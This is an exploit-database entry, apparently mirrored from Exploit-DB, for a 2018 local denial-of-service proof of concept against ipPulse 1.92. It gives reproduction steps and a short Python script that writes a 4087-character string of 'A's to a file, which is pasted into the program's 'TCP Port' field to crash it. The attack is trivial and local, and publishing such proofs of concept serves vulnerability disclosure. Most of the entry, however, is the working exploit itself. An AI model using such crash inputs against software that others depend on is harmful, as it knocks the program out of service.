header-logo
Suggest Exploit
vendor:
ipPulse
by:
Diego Santamaria
N/A
CVSS
N/A
Denial of Service (DoS) Local
Unknown
CWE
Product Name: ipPulse
Affected Version From: 1.92
Affected Version To: 1.92
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 Professional
2018

ipPulse 1.92 – ‘TCP Port’ Denial of Service (PoC)

This exploit allows an attacker to crash the ipPulse 1.92 software by sending a specially crafted TCP Port value. By running the provided python code and following the steps outlined, the software will crash, resulting in a denial of service condition.

Mitigation:

Unknown
Source

Exploit-DB raw data:

# Exploit Title: ipPulse 1.92 - 'TCP Port' Denial of Service (PoC)
# Discovery by: Diego Santamaria
# Discovery Date: 2018-08-28
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
# Software Link: http://download.netscantools.com/ipls192.zip
# Tested Version: 1.92
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional
 
# Steps to Reproduce: 

# 1. Run the python code TCP_port.py 
# 2. Open TCP_exploit.txt and copy the content 
# 3. Open ipPulse.exe 
# 4. Choose 'Target Editor' 
# 5. write '1' in 'IP Adreess'
# 6. Paste the content from exploit.txt on 'TCP Port'
# 7. Press 'Add Above Fields to Target List'
# 8. Press ok and Crashed
 
#!/usr/bin/env python

content = "\x41" * 4087
f = open ("TCP_exploit.txt", "w")
f.write(content)
f.close()